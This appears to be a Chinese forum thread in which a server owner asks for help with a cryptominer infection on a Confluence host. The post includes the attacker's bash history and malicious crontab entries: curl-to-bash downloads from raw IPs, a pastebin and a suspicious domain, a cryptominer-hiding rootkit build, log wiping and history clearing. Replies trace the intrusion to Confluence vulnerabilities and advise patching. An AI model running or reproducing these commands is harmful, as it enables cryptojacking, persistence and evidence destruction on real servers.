




























这是一个创建于 1290 天前的主题,其中的信息可能已经有所发展或是发生改变。
1 export TERM=xterm
2 top
3 /usr/lib/sys/rcu_bj
4 cd /usr/lib/sys/
5 ls
6 chmod +x rcu_bj
7 ./rcu_bj
8 chattr -ia rcu_bj
9 ./rcu_bj
10 cd /
11 mkdir .a
12 cd .a
13 git clone https://github.com/alfonmga/hiding-cryptominers-linux-rootkit.git
14 cd hiding-cryptominers-linux-rootkit/
15 ls
16 make
17 dmesg
18 dmesg -C
19 ls
20 make
21 ls
22 make
23 make
24 cd ..
25 rm -rf hiding-cryptominers-linux-rootkit/
26 curl -LO http://1.234.16.54:7070/apiapi/api/raw/master/s.zip;mv s.zip rcu;chmod +x rcu
27 ./rcu
28 top
29 rm -rf /var/log/*
30 cat /dev/null > ~/.bash_history
31 id
32 curl http://123.30.179.206:8189/solr/.v7/api | bash
33 ps auxw --sort=%cpu|tail -10
34 lscpu
35 ps auxw --sort=%cpu|tail -10
36 ps auxw --sort=%cpu|tail -10
37 ps auxw --sort=%cpu|tail -10
38 ps aux | grep rcu
39 python -c 'import pty; pty.spawn("/bin/bash")'
https://github.com/alfonmga/hiding-cryptominers-linux-rootkit
[root@localhost profile.d]# cd /usr/lib/sys
[root@localhost sys]# ll
总用量 8
-rwxr-x--x 1 root confluence 0 12 月 1 18:38 rcu_bj
-rwxr-x--- 1 root confluence 2786 11 月 14 11:01 rcu_libk
-rwxrwx--- 1 root root 1199 11 月 14 11:01 rcu_udev
-rwxr-x--- 1 root confluence 0 11 月 14 18:02 systemd
[root@localhost sys]# lsattr rcu_bj
---------------- rcu_bj
您在 /var/spool/mail/root 中有邮件
[root@localhost sys]# lsattr rcu_libk
---------------- rcu_libk
[root@localhost sys]# lsattr rcu_undev
lsattr: 没有那个文件或目录 当尝试对 rcu_undev 进行 stat 调用时
[root@localhost sys]# lsattr rcu_udev
---------------- rcu_udev
[root@localhost sys]# ps -ef|grep rcu
root 8 2 0 4 月 13 ? 00:00:06 [rcu_bh]
root 9 2 0 4 月 13 ? 22:01:59 [rcu_sched]
root 168224 243031 0 16:28 pts/24 00:00:00 grep --color=auto rcu
第 1 条附言 · 2022 年 12 月 2 日
[root@localhost sys]# alias
alias cp='cp -i'
alias egrep='egrep --color=auto'
alias fgrep='fgrep --color=auto'
alias grep='grep --color=auto'
alias l.='ls -d .* --color=auto'
alias ll='ls -l --color=auto'
alias ls='ls --color=auto'
alias mv='mv -i'
alias rm='rm -i'
alias which='alias | /usr/bin/which --tty-only --read-alias --show-dot --show-tilde'
[root@localhost sys]# crontab -l
隐藏了什么东西-_-
第 2 条附言 · 2022 年 12 月 5 日
[root@localhost home]# crontab -u confluence -l
*/3 * * * * (curl -fsSL https://pastebin.com/raw/NfCRw0LF||wget -q -O- https://pastebin.com/raw/NfCRw0LF|| bash -sh
* * * * * curl -fsSL http://j0llychic.com/mkdir_trace2.sh | bash > /dev/null 2>&1
*/30 * * * * confluence /var/tmp/.crontab/crontab
这个用户发现了几个定时任务
1 dier 2022 年 12 月 2 日检查一下 alias 有没有配置陌生的别名 看能不能阻止自动启动 |
2 quadrapop 2022 年 12 月 2 日@dier alias 和调度器都看起来正常。 |
3 Nitroethane 2022 年 12 月 2 日首先不确定你给出的 bash 历史记录是否是完整的,因为 "/usr/lib/sys/rcu_bj" 这个文件像是攻击者植入的,默认系统没有这个文件。 首先你得确认攻击者是从什么入口进来的,通过对公网开放的端口大致可以确定。然后搞清楚攻击者通过这个入口进来后拿到的是什么权限,如果是 root 的话可以考虑备份重要数据然后重装了。不过还是得确定从什么入口进来,要把相应的漏洞修复,否则以后还会中招。 |
4 Nitroethane 2022 年 12 月 2 日至于你说的「进程也杀不死」,这两个进程 rcu_sched 和 rcu_bh ,它们的 PPID 都为 2 ,所以是内核线程,肯定杀不死,而且这两个内核线程应该是正常的。 |
5 cxh116 2022 年 12 月 2 日这种情况应该第一时间关机. 再 u 盘启动,备份数据.防止重要数据被删除或加密了.到时怕交 BTC 也拿不回. |
6 quadrapop 2022 年 12 月 5 日@Nitroethane |
7 Nitroethane 2022 年 12 月 5 日注意看我的回复:至于你说的「进程也杀不死」,这两个进程 rcu_sched 和 rcu_bh ,它们的 PPID 都为 2 ,所以是内核线程,肯定杀不死,而且这两个内核线程应该是正常的。 通过 /usr/lib/sys 目录下那两个挖矿木马的文件属性判断,应该是通过 confluence 的漏洞进来的。前段时间 confluence 爆出过好几个高危漏洞,赶紧升级下吧。 |
8 Nitroethane 2022 年 12 月 5 日你贴出来的这些权限维持操作不是同一个人做的,这台服务器应该是像公交车一样,被很多人上了 |
此内容由惯性聚合(RSS阅读器)自动聚合整理,仅供阅读参考。 原文来自 — 版权归原作者所有。